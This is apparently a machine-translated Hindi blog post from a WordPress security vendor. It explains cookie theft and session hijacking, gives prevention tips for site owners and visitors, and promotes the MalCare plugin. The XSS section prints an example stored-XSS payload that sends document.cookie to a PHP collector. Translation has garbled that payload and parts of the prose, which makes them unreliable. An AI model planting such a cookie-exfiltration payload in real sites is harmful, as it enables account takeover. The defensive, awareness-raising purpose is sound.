क्या आप जानते हैं कि आपकी वेबसाइट गोपनीय डेटा संग्रहीत करने के लिए कुकीज़ का उपयोग करती है? क्या आप जानते हैं कि हैकर्स आपकी कुकी आसानी से चुरा सकते हैं? यह आपकी वेबसाइट और विज़िटर्स को जोखिम में डाल सकता है!
कुकीज ग्राहक की विज्ञापन प्राथमिकताओं से लेकर लॉगिन क्रेडेंशियल और क्रेडिट कार्ड की जानकारी तक सभी प्रकार की जानकारी संग्रहीत करती हैं। कुकीज़ का इंटरनेट पर व्यापक रूप से उपयोग किया जाता है और यह डरावना है कि वे कितनी बार चोरी हो जाते हैं।
यदि आप कुकी चोरी या सत्र अपहरण के शिकार हैं, तो इसके गंभीर परिणाम होंगे। न केवल आप राजस्व और अपने आगंतुकों का विश्वास खो देते हैं बल्कि आपको कानूनी मुद्दों और भारी जुर्माना का भी सामना करना पड़ सकता है!
लेकिन चिंता की कोई बात नहीं है, क्योंकि आज हम आपको इन हमलों को रोकने के लिए आवश्यक हर चीज से रूबरू कराने जा रहे हैं!
इस गाइड में, हम सबसे पहले सीखेंगे कि हैकर्स कुकीज़ कैसे चुराते हैं, फिर हम निवारक उपायों से गुजरेंगे।
TL;DR : आपकी WordPress वेबसाइट के बारे में चिंतित हैं? सत्र अपहरण और कुकी चोरी सुरक्षा प्लगिन स्थापित करके आप अभी अपनी साइट को सुरक्षित कर सकते हैं . यह आपकी वेबसाइट को नियमित रूप से स्कैन करेगा और आपको सचेत करेगा कि क्या कोई हैकर कोई दुर्भावनापूर्ण कोड इंजेक्ट करता है जो उन्हें कुकीज़ चोरी करने में सक्षम बनाता है। प्लगइन का उपयोग करके, आप हैक को तुरंत साफ कर सकते हैं और नतीजों से बच सकते हैं।
सामग्री की तालिका
→ कुकी चोरी क्या है?
→ हैकर्स कुकीज़ और हाईजैक सत्रों को चुराने के लिए क्रॉस-साइट स्क्रिप्टिंग (XSS) का उपयोग कैसे करते हैं?
→ कुकी चोरी और सत्र अपहरण को कैसे रोकें?
→ वेबसाइट आगंतुक कुकी चोरी के खिलाफ कदम उठा सकते हैं
कुकी चोरी क्या है?
जितना हम चाहते हैं, कुकी चोरी करना उतना आसान नहीं है जितना कि एक बच्चा अपना हाथ कुकी जार में चिपका लेता है! यह एक जटिल प्रक्रिया है और यह समझने के लिए कि क्या हो रहा है, हमें मूलभूत बातों पर ध्यान देना होगा।
→ कुकी क्या है?
आप कुकीज़ को डेटा के छोटे-छोटे टुकड़ों के रूप में सोच सकते हैं। यह एक वेबसाइट के साथ आपकी बातचीत के बारे में जानकारी संग्रहीत करता है। उदाहरण के लिए, एक ईकामर्स साइट किसी ग्राहक की यात्रा को ट्रैक करना चाहेगी - खोजे गए उत्पाद, खरीदे गए उत्पाद, कार्ट में छोड़े गए आइटम, या वे किन पृष्ठों पर जाते हैं।
यह स्टोर को इस बारे में विश्लेषणात्मक जानकारी देता है कि ग्राहक क्या पसंद करते हैं, कौन से पृष्ठ सबसे अधिक देखे जा रहे हैं, उपयोगकर्ता कितने समय तक एक पृष्ठ पर रहते हैं, आदि। फिर वे इस जानकारी का उपयोग वेबसाइट पर प्रदर्शित होने वाली सामग्री को अनुकूलित करने के लिए कर सकते हैं ग्राहक की पसंद के अनुसार।
कुकीज़ वेबसाइट मालिकों को यह जानकारी देती हैं कि क्या काम करता है और क्या नहीं। इससे उन्हें यह निर्धारित करने में मदद मिलती है कि उन्हें अपनी साइट पर क्या बदलने या सुधारने की आवश्यकता है।
कुकीज़ का उपयोग उपयोगकर्ताओं को प्रासंगिक विज्ञापन प्रदर्शित करने के लिए भी किया जाता है। जब आप वेबसाइटों पर जाते हैं, तो आप देखेंगे कि विज्ञापन प्रदर्शित हो रहे हैं।
ये विज्ञापन आमतौर पर आपके हाल के खोज इतिहास को दर्शाते हैं। उदाहरण के लिए, यदि आपने Google पर 'लैपटॉप' की खोज की है, तो आप देखेंगे कि सभी वेबसाइटों के विज्ञापन आपको dell के विज्ञापन दिखाते हैं। ये विज्ञापन वेबसाइट का हिस्सा नहीं हैं बल्कि Google Adsense जैसी सेवाओं द्वारा नियंत्रित किए जाते हैं।
कुकीज़ वेबसाइट स्वामी और उपयोगकर्ता दोनों के लिए चीजों को सुविधाजनक बनाती हैं। यह जुड़ाव को बढ़ावा दे सकता है और अधिक बिक्री की ओर ले जा सकता है जो वेबसाइट मालिकों के लिए बहुत अच्छा है। जहां तक खरीदार का सवाल है, कुकीज उन्हें वेबसाइट पर अधिक वैयक्तिकृत अनुभव प्राप्त करने या अधिक प्रासंगिक विज्ञापन देखने में मदद करती हैं।
लेकिन बहुत सी कमियां हैं जिनके बारे में हम थोड़ी देर बाद चर्चा करेंगे।
[वापस शीर्ष पर ]
→ ब्राउज़र सत्र और सत्र आईडी क्या है?
जब आप किसी वेबसाइट में लॉग इन करते हैं, तो आपके कंप्यूटर और इस वेबसाइट के बीच एक सत्र बन जाता है।
उदाहरण के लिए, जब आप Facebook में लॉग इन करते हैं, तो एक सत्र शुरू होता है। यह आपको फेसबुक का उपयोग जारी रखने की अनुमति देता है (भले ही आप वेब ब्राउज़र को बंद और फिर से खोलें) जब तक आप 'लॉग आउट' पर क्लिक नहीं करते और सत्र समाप्त नहीं करते।
यदि सत्र नहीं बनाया गया था, तो आपको हर बार लॉग इन करते रहना होगा आप नया डेटा चाहते थे। उदाहरण के लिए, यदि आप अपना फेसबुक न्यूज फीड छोड़ना चाहते हैं और किसी मित्र का प्रोफाइल पेज देखना चाहते हैं, तो आप फेसबुक से लॉग आउट हो जाएंगे और लॉग इन करने और दोस्त की प्रोफाइल देखने के लिए आपको फिर से अपनी साख दर्ज करनी होगी।
इसलिए सत्रों की जरूरत है। यह आपको लॉग इन रखता है ताकि आप विभिन्न वेब पेजों के माध्यम से ब्राउज़ करना जारी रख सकें और वेबसाइट पर नेविगेट कर सकें।
यहां ध्यान देने योग्य बात यह है कि प्रत्येक सत्र कुकीज़ का एक सेट उत्पन्न करता है। हम इन सत्र कुकीज़ को कॉल कर सकते हैं। और प्रत्येक सत्र कुकी की एक अद्वितीय सत्र आईडी होती है।
एक वेबसाइट उपयोगकर्ता को प्रमाणित करने और एक विश्वसनीय कनेक्शन स्थापित करने के लिए इस आईडी का उपयोग करती है।
उदाहरण के लिए, फेसबुक में लॉग इन करने के लिए, आपको अपना उपयोगकर्ता नाम और पासवर्ड दर्ज करना होगा। इसके बाद, एक अद्वितीय आईडी के साथ एक सत्र बनाया जाता है। आपके द्वारा Facebook वेबसाइट पर किए गए किसी भी अनुरोध को इस आईडी से प्रमाणित किया जाएगा। इसलिए, जब आप एक अलग पेज देखना चाहते हैं, तो आप उस पेज को प्रदर्शित करने के लिए फेसबुक सर्वर को एक अनुरोध भेज रहे होंगे। फेसबुक आईडी की पुष्टि करता है और वह सामग्री प्रदर्शित करता है जिसे आप देखना चाहते हैं।
अब, हैकर्स आपके सत्र को हाईजैक कर सकते हैं और इस विश्वसनीय कनेक्शन का दुरुपयोग कर सकते हैं। वे आपकी ओर से दुर्भावनापूर्ण अनुरोध भेज सकते हैं। आइए देखें कैसे।
[वापस शीर्ष पर ]
→ कुकीज़ के साथ सुरक्षा संबंधी चिंताएं क्या हैं?
जब कुकीज़ उत्पन्न होती हैं, तो वे केवल आपके द्वारा देखी जा सकती हैं - साइट स्वामी। कोई अन्य वेबसाइट आपकी कुकीज़ नहीं देख सकती है। वे पूरी तरह से आपके हैं।
लेकिन ये कुकीज़ पूरे इंटरनेट पर यात्रा करती हैं। उनका उपयोग विज्ञापन सेवाओं और विश्लेषण सेवाओं द्वारा किया जाता है। तो ये कुकीज़ पूरी दुनिया में सर्वर से सर्वर तक उछलती हैं। यदि कनेक्शन सुरक्षित नहीं है, तो हैकर आसानी से इन कुकीज़ को इंटरसेप्ट और चोरी कर सकता है।
अब, आप सोच सकते हैं कि यदि कोई हैकर आपकी खरीदारी की प्राथमिकताओं के बारे में जानकारी प्राप्त कर लेता है, तो बड़ी बात है, है ना?
समस्या यह है कि कुकीज़ केवल आपकी खरीदारी प्राथमिकताओं के बारे में जानकारी से अधिक संग्रहीत हैं। यह बैंक विवरण और व्यक्तिगत जानकारी भी संग्रहीत करता है जैसे आपका शिपिंग पता और संपर्क विवरण।
यदि इस प्रकार की जानकारी गलत हाथों में पड़ जाती है, तो इसका धोखाधड़ी गतिविधियों के लिए दुरुपयोग किया जा सकता है।
सबसे आम तरीकों में से एक हैकर्स कुकीज़ चुराते हैं यदि वे उसी वाईफाई का उपयोग कर रहे हैं जो आप कर रहे हैं। इस तरह की वाईफाई हैकिंग को मैन-इन-द-मिडिल अटैक कहा जाता है और यह तभी हो सकता है जब दोनों एक ही वायरलेस नेटवर्क से जुड़े हों। इसीलिए यह सलाह दी जाती है कि सार्वजनिक वाईफाई का उपयोग कभी न करें जो असुरक्षित है या कई लोगों द्वारा उपयोग किया जाता है। यह समान कंप्यूटर नेटवर्क के उपयोगकर्ताओं के साथ भी हो सकता है।
कुछ अन्य तरीकों में पैकेट सूँघना और क्रॉस-साइट स्क्रिप्टिंग नामक भेद्यता का शोषण करना शामिल है। आज, हम आपको विस्तार से दिखाने जा रहे हैं कि XSS कुकी चोरी कैसे काम करती है।
[वापस शीर्ष पर ]
हैकर्स कुकीज़ और हाईजैक सत्रों को चुराने के लिए क्रॉस-साइट स्क्रिप्टिंग (XSS) का उपयोग कैसे करते हैं?
आपको यह दिखाने के लिए कि हैकर्स क्रॉस-साइट स्क्रिप्टिंग (XSS) हमलों का उपयोग करके कुकीज़ कैसे चुराते हैं, हम एक उदाहरण का उपयोग करेंगे। मान लें कि आप किसी ऐसी वेबसाइट पर जाते हैं, जिस पर टिप्पणी अनुभाग है।
आपके द्वारा की गई कोई भी टिप्पणी वेबसाइट के डेटाबेस में भेजी जाएगी। आदर्श रूप से, इस टिप्पणी अनुभाग को केवल सादा अंग्रेजी में पाठ स्वीकार करने के लिए कॉन्फ़िगर किया जाना चाहिए। लेकिन अगर यह विशेष वर्णों को भी स्वीकार करता है, तो यह इसे XSS के लिए असुरक्षित बनाता है।
एक हैकर अपने स्वयं के दुर्भावनापूर्ण कोड दर्ज कर सकता है जो डेटाबेस को भेजे जाएंगे। एक बार अंदर जाने के बाद, कोड निष्पादित हो जाएगा। ऐसे कई कोड हैं जिन्हें हैकर वेबसाइट में डाल सकते हैं ताकि वे हर तरह की दुर्भावनापूर्ण गतिविधियों को चला सकें जैसे कि एक नई वेबसाइट व्यवस्थापक बनाना या कुकीज़ चुराना।
कुकीज़ चुराने के लिए, हैकर निम्नलिखित कोड दर्ज कर सकता है:
नोट:यह कुकीज चोरी करने के बारे में कोई ट्यूटोरियल नहीं है। इस लेख का उद्देश्य वेबसाइट मालिकों को इस बात से अवगत कराना है कि हैकर्स कुकीज़ को कैसे चुरा सकते हैं। हम आपको कोई भी अवैध गतिविधि करने की सलाह नहीं देते हैं।
[php]
दस्तावेज़.लिखें amp;amp;amp;quot;https://localhost/submitcookie.php?कुकी ='
+ एस्केप (डॉक्यूमेंट.कुकी) + '" />);
[/php]
टिप्पणी अनुभाग में, यह कोड एक छवि के रूप में दिखाई देगा। यदि आप (एक आगंतुक के रूप में) उस पर क्लिक करते हैं, तो आपको एक छवि प्रदर्शित होगी। लेकिन अभी हुआ ही नहीं है।
जब आप छवि पर क्लिक करते हैं, तो यह PHP फ़ाइल चुपचाप कोड निष्पादित करती है और आपकी सत्र कुकी और सत्र आईडी को पकड़ लेती है।
अब हैकर आपके सत्र को फिर से बना सकता है और उस वेबसाइट पर आपके जैसा पोज दे सकता है। वे कई तरह के दुर्भावनापूर्ण कृत्यों को अंजाम दे सकते हैं। उदाहरण के लिए, यदि आपकी कुकी में आपका क्रेडिट कार्ड या कोई अन्य भुगतान जानकारी है, तो वे खरीदारी कर सकते हैं।
सौभाग्य से, वेबसाइट के मालिकों के साथ-साथ इसके आगंतुकों को इन हैक्स से बचाने के लिए निवारक उपाय हैं।
वेबसाइटों के कमेंट सेक्शन और ईमेल में कभी भी संदिग्ध लिंक पर क्लिक न करें। आप कुकी चोरी के शिकार हो सकते हैं। ट्वीट करने के लिए क्लिक करें[वापस शीर्ष पर ]
कुकी चोरी और सत्र अपहरण को कैसे रोकें?
दो पक्ष हैं जो कुकी चोरी और सत्र अपहरण को रोकने में भूमिका निभाते हैं - वेबसाइट स्वामी और आगंतुक। हम दोनों पक्षों के लिए निवारक उपायों पर चर्चा करेंगे।
→ कुकी चोरी के खिलाफ वेबसाइट के मालिक उपाय कर सकते हैं
एक वेबसाइट के मालिक के रूप में, यदि आपके पास यह सब संभालने के लिए सुरक्षा विश्लेषक नहीं है, तो आपको निम्नलिखित निवारक उपायों को लागू करने की आवश्यकता है:
1. SSL प्रमाणपत्र स्थापित करें
उपयोगकर्ता के ब्राउज़र और आपके वेब सर्वर के बीच डेटा लगातार स्थानांतरित किया जाता है। एसएसएल के बिना, यह डेटा (कुकीज़) सादे पाठ में भेजा जाता है। यदि कोई हैकर इस डेटा को इंटरसेप्ट करता है, तो वे इसे आसानी से पढ़ सकते हैं। इसलिए यदि इसमें लॉगिन क्रेडेंशियल शामिल हैं, तो यह सामने आ जाएगा।
एसएसएल (सिक्योर सॉकेट लेयर) डेटा को ट्रांसफर करने से पहले एन्क्रिप्ट करेगा। इसलिए अगर कोई हैकर इसे चुरा भी लेता है, तो भी वे डेटा नहीं पढ़ सकते हैं।
आप अपनी वेब होस्टिंग कंपनी के माध्यम से या किसी SSL प्रदाता से SSL प्रमाणपत्र प्राप्त कर सकते हैं। आप Let’s Encrypt से एक बेसिक फ्री एसएसएल सर्टिफिकेट भी प्राप्त कर सकते हैं।
2. सुरक्षा प्लगइन स्थापित करें
एक वर्डप्रेस सुरक्षा प्लग इन रखें जैसे कि आपकी वेबसाइट पर मलकेयर सक्रिय है। प्लगइन का फ़ायरवॉल आपकी वेबसाइट पर हैक के प्रयासों को रोकेगा और दुर्भावनापूर्ण IP पतों को ब्लॉक करेगा। साथ ही, यह आपकी साइट को नियमित रूप से स्कैन करेगा और हैकर द्वारा कोई दुर्भावनापूर्ण कोड दर्ज किए जाने पर आपको सचेत करेगा। आप अपनी वेबसाइट को तुरंत साफ कर सकते हैं। इससे आपको ऐसे हैक प्रयासों का तुरंत पता लगाने और उन्हें हटाने में मदद मिलेगी, इससे पहले कि वे कोई नुकसान पहुंचाएं।
3. अपनी वेबसाइट अपडेट करें
अपनी वेबसाइट को हमेशा अपडेट रखें, इसमें वर्डप्रेस इंस्टॉलेशन, थीम और प्लगइन्स शामिल हैं। पुराने सॉफ़्टवेयर पर चलने से आपकी वेबसाइट पर कई संवेदनशील स्थान खुल जाते हैं जिनका हैकर्स फायदा उठा सकते हैं। जब भी कोई नया अपडेट उपलब्ध हो, सुनिश्चित करें कि आप अपनी साइट को अपडेट करते हैं।
इन अपडेट में न केवल नई सुविधाएं और बग फिक्स होते हैं, बल्कि वे समय-समय पर सुरक्षा खामियों को भी ठीक करते हैं।
4. अपनी वेबसाइट को सख्त करें
WordPress.org कुछ वेबसाइट सख्त उपायों की अनुशंसा करता है जिन्हें आपको अपनी वेबसाइट पर लागू करना चाहिए। इसमें मजबूत और अद्वितीय उपयोगकर्ता नाम और मजबूत पासवर्ड का उपयोग करना, अज्ञात फ़ोल्डरों में PHP निष्पादन को रोकना, थीम और प्लगइन्स में फ़ाइल संपादक को अक्षम करना और बहुत कुछ शामिल है। अब, यह सब आपको शब्दजाल की तरह लग सकता है, इसलिए हमने वर्डप्रेस हार्डनिंग के लिए एक गहन चरण-दर-चरण मार्गदर्शिका बनाई है जिसका आप अनुसरण कर सकते हैं।
[वापस शीर्ष पर ]
वेबसाइट विज़िटर कुकी चोरी के खिलाफ़ कदम उठा सकते हैं
एक वेबसाइट विज़िटर के रूप में, आपको आँख बंद करके भरोसा करने की ज़रूरत नहीं है कि वेबसाइटों ने उचित सुरक्षा उपाय किए हैं। आप निम्न वेब सुरक्षा प्रोटोकॉल से अपनी सुरक्षा कर सकते हैं।
1. एक प्रभावी एंटी-वायरस स्थापित करें
सुनिश्चित करें कि आप जिस डिवाइस का उपयोग इंटरनेट एक्सेस करने के लिए कर रहे हैं, उसमें एंटी-मैलवेयर सॉफ़्टवेयर स्थापित है। यदि आप किसी दुर्भावनापूर्ण वेबसाइट पर जाते हैं तो मैलवेयर का पता चलने पर यह आपको सचेत करेगा। यह किसी भी मैलवेयर को भी हटा देगा जिसे आप गलती से अपने सिस्टम पर डाउनलोड या इंस्टॉल कर सकते हैं।
2. कभी भी संदिग्ध लिंक पर क्लिक न करें
हैकर्स वेबसाइटों पर कमेंट सेक्शन और ईमेल के जरिए यूजर्स को निशाना बनाते हैं। अविश्वसनीय लिंक पर क्लिक करने से बचें, विशेष रूप से वे जो आपको आकर्षक ऑफ़र या छूट का लालच देते हैं।
3. संवेदनशील डेटा स्टोर करने से बचें
शॉपिंग वेबसाइटों पर क्रेडिट कार्ड की जानकारी संग्रहीत करने से चेकआउट तेज और अधिक सुविधाजनक हो जाता है। Google Chrome जैसे वेब ब्राउज़र पर वेबसाइटों में स्वतः लॉग इन करने के लिए पासवर्ड सहेजना पासवर्ड याद रखने की आवश्यकता को समाप्त कर देता है!
लेकिन यह सब चोरी होने के एक उच्च जोखिम के साथ आता है। वेबसाइटों पर संवेदनशील डेटा को कभी भी स्टोर न करना सबसे अच्छा है। It may save you a few seconds, but it also puts you at risk of being attacked.
4. Clear Cookies
You can clear your cookies regularly to get rid of any sensitive information stored in browsers like Google Chrome. Access History> Clear Browsing History. Here, tick the checkbox ‘Cookies and other site data’.
Choose the time range ‘All Time’ or one that is according to your preference. Next, click ‘Clear data’ and the cookies will be deleted from your browser’s history.
That brings us to an end to cookie stealing. We hope this article has helped you gain a better understanding of what exactly happens and how to prevent it.
This guide from MalCare helped me understand cookie stealing and how to take preventive measures against it. Check it out. Click to Tweet[वापस शीर्ष पर ]
अंतिम विचार
As a website owner, you need to take protective measures to secure your own interests as well as your visitors, clients, and customers. But we understand that setting up a website and managing it is a hard task.
There is an endless number of things to take care of which is why WordPress security tends to take a backseat many times.
But ignoring the security aspect of your website can prove to be disastrous to all your other efforts.
An easy, quick and efficient solution is the MalCare security plugin. You can think of it as a security guard that you hire. It will work round the clock to regularly scan your website and protect it from attacks. You can rest assured that your website is in safe hands.
<मजबूत>
Keep your WordPress site protected with मैलकेयर !